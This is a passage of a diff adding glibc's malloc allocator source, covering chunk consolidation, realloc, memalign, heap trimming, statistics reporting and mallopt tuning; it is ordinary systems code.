+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
